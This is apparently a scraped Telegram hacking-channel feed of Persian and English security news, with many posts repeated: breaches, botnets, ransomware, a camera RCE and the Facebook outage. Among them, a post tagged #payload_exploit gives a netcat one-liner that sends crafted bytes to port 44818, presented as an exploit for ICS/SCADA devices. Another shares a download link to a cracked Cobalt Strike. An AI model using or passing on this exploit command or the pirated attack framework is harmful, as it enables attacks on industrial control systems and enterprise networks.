اپراتور T-Mobile هک اطلاعات محرمانه ۴۷ میلیون مشترک خود را تایید کرد
اپراتور T-Mobile اعلام کرده است که تحقیقات داخلی پیرامون حادثه اخیر هنوز در جریان است، اما افشای اطلاعات ۴۷.۸ میلیون کاربر از سوی این شرکت تایید شده است. طبق آخرین گزارشهای رسمی مالی منتشر شده، اپراتور گفته شده دارای بیش از ۱۰۴ میلیون مشترک است.
@UNIDENTIFIED_TM
#news
اپراتور T-Mobile اعلام کرده است که تحقیقات داخلی پیرامون حادثه اخیر هنوز در جریان است، اما افشای اطلاعات ۴۷.۸ میلیون کاربر از سوی این شرکت تایید شده است. طبق آخرین گزارشهای رسمی مالی منتشر شده، اپراتور گفته شده دارای بیش از ۱۰۴ میلیون مشترک است.
@UNIDENTIFIED_TM
#news
یک پلت فرم بد افزار مدولار با نام ShadowPad که به صورت خصوصی فروخته می شود ، مورد علاقه گروه های جاسوسی سایبری چین قرار گرفته است.
این بک دور اصلی بود که در کمپین های جاسوسی متعدد از جمله حملات CCleaner ، NetSarang و ASUS Supply-Chain استفاده می شد.
@UNIDENTIFIED_TM
این بک دور اصلی بود که در کمپین های جاسوسی متعدد از جمله حملات CCleaner ، NetSarang و ASUS Supply-Chain استفاده می شد.
@UNIDENTIFIED_TM
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد.
محققان مرکز امنیت تهدیدات امنیتی مایکروسافت و بخش 52 در Azure Defender برای IoT در مقاله ای فنی گفتند: "با آلوده کردن روترها ، آنها می توانند حملات man-in-the-middle (MITM)-از طریق ربودن HTTP و جعل DNS-برای به خطر انداختن نقاط پایانی و استقرار باج افزار یا ایجاد حوادث ایمنی در امکانات OT انجام دهند.”
@UNIDENTIFIED_TM
#news
محققان مرکز امنیت تهدیدات امنیتی مایکروسافت و بخش 52 در Azure Defender برای IoT در مقاله ای فنی گفتند: "با آلوده کردن روترها ، آنها می توانند حملات man-in-the-middle (MITM)-از طریق ربودن HTTP و جعل DNS-برای به خطر انداختن نقاط پایانی و استقرار باج افزار یا ایجاد حوادث ایمنی در امکانات OT انجام دهند.”
@UNIDENTIFIED_TM
#news
Unidentified T E A M
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد. محققان مرکز امنیت…
According to new findings, Mozi, a peer-to-peer (P2P) botnet targeting IoT devices, has acquired new capabilities that allow it to access the network gateways produced by Netgear. Huawei and ZTE reach longevity.
"By infecting routers, they can launch man-in-the-middle (MITM) attacks - by hijacking HTTP and forging DNS - "Endanger endpoints and install ransomware or create security incidents in OT facilities."
@UNIDENTIFIED_TM
#news
"By infecting routers, they can launch man-in-the-middle (MITM) attacks - by hijacking HTTP and forging DNS - "Endanger endpoints and install ransomware or create security incidents in OT facilities."
@UNIDENTIFIED_TM
#news
Forwarded from Predator-OS
Media is too big
VIEW IN TELEGRAM
The Tutorial mode in Linux predator-os includes many offline tutorials which will be available to beginners and academy users through this menu.
In this mode, many training files, such as:
*.overview on security
*.Security checklists
*.Cheat sheets. A variety of cheat sheets from Linux, security, hacking, programming languages, etc.
*.Linux shortcut key
*.Quick tutorial and Linux tutorial
*.Quick security training and security tutorial
All the above files are available through the menu in pdf format.
==========
مد آموزشی در لینوکس predator-os شامل آموزشهای زیادی به صورت آفلاین که از طریق این منو برای کاربران تازه کار و آکادمی در دسترس خواهد بود.
در این مد فایل های آموزشی زیادی ازجمله:
معرفی امنیت
چک لیست های امنیتی
برگ های تقلب cheat sheet
کلید میانبرهای لینوکس
آموزش سریع و خود آموز لینوکس
آموزش سریع امنیت
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
https://t.me/predator_os
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
In this mode, many training files, such as:
*.overview on security
*.Security checklists
*.Cheat sheets. A variety of cheat sheets from Linux, security, hacking, programming languages, etc.
*.Linux shortcut key
*.Quick tutorial and Linux tutorial
*.Quick security training and security tutorial
All the above files are available through the menu in pdf format.
==========
مد آموزشی در لینوکس predator-os شامل آموزشهای زیادی به صورت آفلاین که از طریق این منو برای کاربران تازه کار و آکادمی در دسترس خواهد بود.
در این مد فایل های آموزشی زیادی ازجمله:
معرفی امنیت
چک لیست های امنیتی
برگ های تقلب cheat sheet
کلید میانبرهای لینوکس
آموزش سریع و خود آموز لینوکس
آموزش سریع امنیت
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
https://t.me/predator_os
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
دستور اکسپلویت کردن آسیب پذیری برخی دیوایس های ICS و SCADA روی پورت 44818/TCP
@UNIDENTIFIED_TM
#payload_exploit
echo -e ”\x00\x00\xE8\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00”
| nc -w 2 <target_IP> 44818 > /dev/null
@UNIDENTIFIED_TM
#payload_exploit
Unidentified T E A M
@UNIDENTIFIED_TM
امنیت سایبری در تاسیسات هسته ای :
لایه های امنیتی در تاسیسات هسته ای به شدت زیاد هستند و دیتاسرور و لایه IT تحت حفاظت DMZ قرار دارند.
ارتباط هر لایه با لایه دیگر قطع میشود، سیستم ها از شبکه نیز جدا هستند و تمام برنامه ها در محیط سندباکس باز میشوند.
2 فایروال در لایه IT قبل از PLC و SCADA وجود دارد.
سیستمی به اسم SCRAM با افزایش دما یا فشار و تغییرات غیرمنتظره راکتور هسته ای را خاموش میکند. تمام اینها باعث برقراری امنیت زیاد و شکست خوردن بسیاری از حملات قبل از رسیدن به مراحل خطرناک می شود.
اما این امنیت بالا فقط در تاسیسات هسته ای صدق میکند، سیستم های کنترل صنعتی در مهم ترین زیرساخت های هر کشوری وجود دارند و تمام منابع و آب،گاز،نفت،برق و ... توسط این سیستم ها کنترل میشود که خیلی از آنها به اینترنت نیز وصل هستند و قابل نفوذ می باشند.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team
لایه های امنیتی در تاسیسات هسته ای به شدت زیاد هستند و دیتاسرور و لایه IT تحت حفاظت DMZ قرار دارند.
ارتباط هر لایه با لایه دیگر قطع میشود، سیستم ها از شبکه نیز جدا هستند و تمام برنامه ها در محیط سندباکس باز میشوند.
2 فایروال در لایه IT قبل از PLC و SCADA وجود دارد.
سیستمی به اسم SCRAM با افزایش دما یا فشار و تغییرات غیرمنتظره راکتور هسته ای را خاموش میکند. تمام اینها باعث برقراری امنیت زیاد و شکست خوردن بسیاری از حملات قبل از رسیدن به مراحل خطرناک می شود.
اما این امنیت بالا فقط در تاسیسات هسته ای صدق میکند، سیستم های کنترل صنعتی در مهم ترین زیرساخت های هر کشوری وجود دارند و تمام منابع و آب،گاز،نفت،برق و ... توسط این سیستم ها کنترل میشود که خیلی از آنها به اینترنت نیز وصل هستند و قابل نفوذ می باشند.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team
Unidentified T E A M
@UNIDENTIFIED_TM
Cyber security in nuclear facilities:
The security layers in nuclear installations are extremely high and the data server and IT layer are under DMZ protection.
Each layer is disconnected from the other, systems are disconnected from the network, and all applications open in the sandbox environment.
There are 2 firewalls in the IT layer before PLC and SCADA.
A system called SCRAM shuts down the nuclear reactor by increasing temperature or pressure and unexpected changes. All this leads to high security and the failure of many attacks before reaching dangerous stages.
But this high security applies only to nuclear facilities, industrial control systems exist in the most important infrastructure of any country, and all resources and water, gas, oil, electricity, etc. are controlled by these systems, many of which They are also connected to the Internet and are vulnerable.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team
The security layers in nuclear installations are extremely high and the data server and IT layer are under DMZ protection.
Each layer is disconnected from the other, systems are disconnected from the network, and all applications open in the sandbox environment.
There are 2 firewalls in the IT layer before PLC and SCADA.
A system called SCRAM shuts down the nuclear reactor by increasing temperature or pressure and unexpected changes. All this leads to high security and the failure of many attacks before reaching dangerous stages.
But this high security applies only to nuclear facilities, industrial control systems exist in the most important infrastructure of any country, and all resources and water, gas, oil, electricity, etc. are controlled by these systems, many of which They are also connected to the Internet and are vulnerable.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team
خانواده باج افزار جدید LockFile که ماه گذشته منتشر شد از یک تکنیک جدید موسوم به ""intermittent encryption" برای بک دور حفاظت از باج افزارهای رفتاری و مبتنی بر آمار استفاده می کند.
@UNIDENTIFIED_TM
@UNIDENTIFIED_TM
Forwarded from Predator-OS
Media is too big
VIEW IN TELEGRAM
موتور جستجوهای امنیتی در توزیع predator-os
========================
موتورهای جستجو امنیتی همچنین می توانند ابزارهای ارزشمندی برای تحلیلگران ، محققان امنیتی و دیگران باشند. این ابزارها می توانند به متخصصان امنیتی در یافتن تهدیدهای ردیابی ، دستگاه های در معرض دید ، آماده سازی برای شبیه سازی فیشینگ نیزه و موارد دیگر کمک کنند.
توزیع predator-os دارای موتورجستجوهای امنیتی است که اغلب توسط متخصصان امنیتی ، هکرها و کسانی که مایل به انجام جستجوی عمیق تر مانند Google و دیگر موتورهای جستجوی تجاری هستند استفاده می شود.
====================
Search engines used by security professionals, are valuable tools for both red teams and blue teams, as well as security researchers, analysts, and others. These tools can help in finding exposed devices, tracking threats, preparing for spear phishing simulations, and much, much more in the area of security operations
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
========================
موتورهای جستجو امنیتی همچنین می توانند ابزارهای ارزشمندی برای تحلیلگران ، محققان امنیتی و دیگران باشند. این ابزارها می توانند به متخصصان امنیتی در یافتن تهدیدهای ردیابی ، دستگاه های در معرض دید ، آماده سازی برای شبیه سازی فیشینگ نیزه و موارد دیگر کمک کنند.
توزیع predator-os دارای موتورجستجوهای امنیتی است که اغلب توسط متخصصان امنیتی ، هکرها و کسانی که مایل به انجام جستجوی عمیق تر مانند Google و دیگر موتورهای جستجوی تجاری هستند استفاده می شود.
====================
Search engines used by security professionals, are valuable tools for both red teams and blue teams, as well as security researchers, analysts, and others. These tools can help in finding exposed devices, tracking threats, preparing for spear phishing simulations, and much, much more in the area of security operations
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
Unidentified T E A M
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد. محققان مرکز امنیت…
Chinese law enforcement authorities have arrested cybercriminals behind the Mozi IoT botnet, nearly two years after the malware first appeared on the threat landscape.
@UNIDENTIFIED_TM
Read details: https://thehackernews.com/2021/09/chinese-authorities-arrest-hackers.html
@UNIDENTIFIED_TM
Read details: https://thehackernews.com/2021/09/chinese-authorities-arrest-hackers.html
Cobalt Strike 4.4
Cracked version.
Link: https://anonfiles.com/v7Ha1aF1uf/CobaltStrike4.4_GhostSec_7z
What is cobalt strike?
Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers.
Providing features from Recon to post exploitation and much more
@UNIDENTIFIED_TM
Cracked version.
Link: https://anonfiles.com/v7Ha1aF1uf/CobaltStrike4.4_GhostSec_7z
What is cobalt strike?
Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers.
Providing features from Recon to post exploitation and much more
@UNIDENTIFIED_TM
پروتون میل دیگر سرویس امنی برای هکرها نیست
برخلاف شعار no-log شرکت پروتون میل، این سرویس دهنده ایمیل قرار است از این به بعد IP و جزییات حسابهایی که از آنها شکایت شده و تحت پیگرد قرار میگیرند به مراجع قانونی تحویل دهد.
https://thehackernews.com/2021/09/protonmail-shares-activists-ip-address.html
#protonmail
#privacy
#news
منبع
#sec nerd
@Unidentified_TM
برخلاف شعار no-log شرکت پروتون میل، این سرویس دهنده ایمیل قرار است از این به بعد IP و جزییات حسابهایی که از آنها شکایت شده و تحت پیگرد قرار میگیرند به مراجع قانونی تحویل دهد.
https://thehackernews.com/2021/09/protonmail-shares-activists-ip-address.html
#protonmail
#privacy
#news
منبع
#sec nerd
@Unidentified_TM
Unidentified T E A M
https://www.joyk.com/dig/detail/1631661543188291
https://acloud.guru/series/linux-this-month/view/209
Cara Nolte explores the latest Linux kernel version 5.14. Now in GA, it boasts features such as mainline support for Raspberry Pi 400, core scheduling and improvements to Intel and AMD graphics drivers. Cara also takes a look at the Debian 11 Bullseye release, Linux Mint’s fresh new look, Linux Lite 5.6 release, the upcoming Ubuntu 22.04 LTS and Predator-OS!
@Unidentified_TM
Cara Nolte explores the latest Linux kernel version 5.14. Now in GA, it boasts features such as mainline support for Raspberry Pi 400, core scheduling and improvements to Intel and AMD graphics drivers. Cara also takes a look at the Debian 11 Bullseye release, Linux Mint’s fresh new look, Linux Lite 5.6 release, the upcoming Ubuntu 22.04 LTS and Predator-OS!
@Unidentified_TM
Unauthenticated RCE vulnerability in
Hikvision IP camera/NVR firmware (CVE-2021-36260)
https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html @Unidentified_TM
Hikvision IP camera/NVR firmware (CVE-2021-36260)
https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html @Unidentified_TM
مشکل اختلال در سرویسهای فیسبوک از جمله اینستاگرام و واتساپ ناشی از DNS هست که ظاهرا به دلیل ناپدید شدن BGP فیسبوک از اینترنت ناشی شده
ناپدید شدن BGP فیسبوک از اینترنت، باعث میشه سرویسهای DNS نتونن IP سرورهای فیسبوک رو پیدا کنن که نتیجه اون این هست که کاربران هم امکان وصل شدن به سرورهای فیسبوک رو نخواهد داشت که اثراتش همین قطع شدن اپهای فیسبوک، اینستاگرام و واتساپ برای اونهاست.
این مورد توسط شرکت کلادفلیر که صاحب یکی از شلوغ ترین DNS های جهان یعنی 1.1.1.1 هست، تایید شده و این شرکت به خاطر پیدا نشدن IP های فیسبوک، درخواستهای بسیار زیادی از کاربران دریافت کرده و نرخ خطاهای این سرویس بالا رفته.
طبق گفته یکی از مهندسان فیسبوک در ردیت، در اشتباهی بزرگ، اپدیتی که مهندسان فیسبوک امروز برای تجهیزات شبکه فیسبوک ارسال کردن باعث مشکلی در تنظیمات این تجهیزات شده، بنابراین این تجهیزات نمیتونن IP سرورهای فیسبوک رو به بقیه BGP ها مخابره کنن، این مشکل ناپدید شدن BGP فیسبوک رو از اینترنت به دنبال داشته که باعث شده سرویس های فیسبوک توسط کاربران قابل دسترسی و پیدا کردن نباشن.
این اپدیت جدید باعث شده که مهندسان نتونن از راه دور تجهیزات شبکه فیسبوک رو اصلاح کنن و از شبکه بیرون بیافتن. در نتیجه تنها کسانی که دسترسی فیزیکی به این تجهیزات دارن امکان تغییر در تنظیمات و اصلاح اونهارو دارن. اما همین افراد، که به این تجهیزات دسترسی فیزیکی دارن، دارای اعتبار لازم برای دسترسی نرم افزاری به اونها نیستن.
در نتیجه این قضیه باعث مشکلات لجستیکی زیادی شده چون کسانی که دسترسی لازم برای اعلام تغییرات دارن از اون دورن و باید حضوری در محل حاضر بشن و کسانی که حضوری در محل هستن، دسترسی های لازم برای اعمال تغییرات رو ندارن.
علاوه بر این که به خاطر پاندمی، تعداد افراد حاضر در دیتاسنترهای فیسبوک کم هست که این قضیه رو بیش از پیش بدتر میکنه
گروه برنامه نویسان
@Unidentified_TM
ناپدید شدن BGP فیسبوک از اینترنت، باعث میشه سرویسهای DNS نتونن IP سرورهای فیسبوک رو پیدا کنن که نتیجه اون این هست که کاربران هم امکان وصل شدن به سرورهای فیسبوک رو نخواهد داشت که اثراتش همین قطع شدن اپهای فیسبوک، اینستاگرام و واتساپ برای اونهاست.
این مورد توسط شرکت کلادفلیر که صاحب یکی از شلوغ ترین DNS های جهان یعنی 1.1.1.1 هست، تایید شده و این شرکت به خاطر پیدا نشدن IP های فیسبوک، درخواستهای بسیار زیادی از کاربران دریافت کرده و نرخ خطاهای این سرویس بالا رفته.
طبق گفته یکی از مهندسان فیسبوک در ردیت، در اشتباهی بزرگ، اپدیتی که مهندسان فیسبوک امروز برای تجهیزات شبکه فیسبوک ارسال کردن باعث مشکلی در تنظیمات این تجهیزات شده، بنابراین این تجهیزات نمیتونن IP سرورهای فیسبوک رو به بقیه BGP ها مخابره کنن، این مشکل ناپدید شدن BGP فیسبوک رو از اینترنت به دنبال داشته که باعث شده سرویس های فیسبوک توسط کاربران قابل دسترسی و پیدا کردن نباشن.
این اپدیت جدید باعث شده که مهندسان نتونن از راه دور تجهیزات شبکه فیسبوک رو اصلاح کنن و از شبکه بیرون بیافتن. در نتیجه تنها کسانی که دسترسی فیزیکی به این تجهیزات دارن امکان تغییر در تنظیمات و اصلاح اونهارو دارن. اما همین افراد، که به این تجهیزات دسترسی فیزیکی دارن، دارای اعتبار لازم برای دسترسی نرم افزاری به اونها نیستن.
در نتیجه این قضیه باعث مشکلات لجستیکی زیادی شده چون کسانی که دسترسی لازم برای اعلام تغییرات دارن از اون دورن و باید حضوری در محل حاضر بشن و کسانی که حضوری در محل هستن، دسترسی های لازم برای اعمال تغییرات رو ندارن.
علاوه بر این که به خاطر پاندمی، تعداد افراد حاضر در دیتاسنترهای فیسبوک کم هست که این قضیه رو بیش از پیش بدتر میکنه
گروه برنامه نویسان
@Unidentified_TM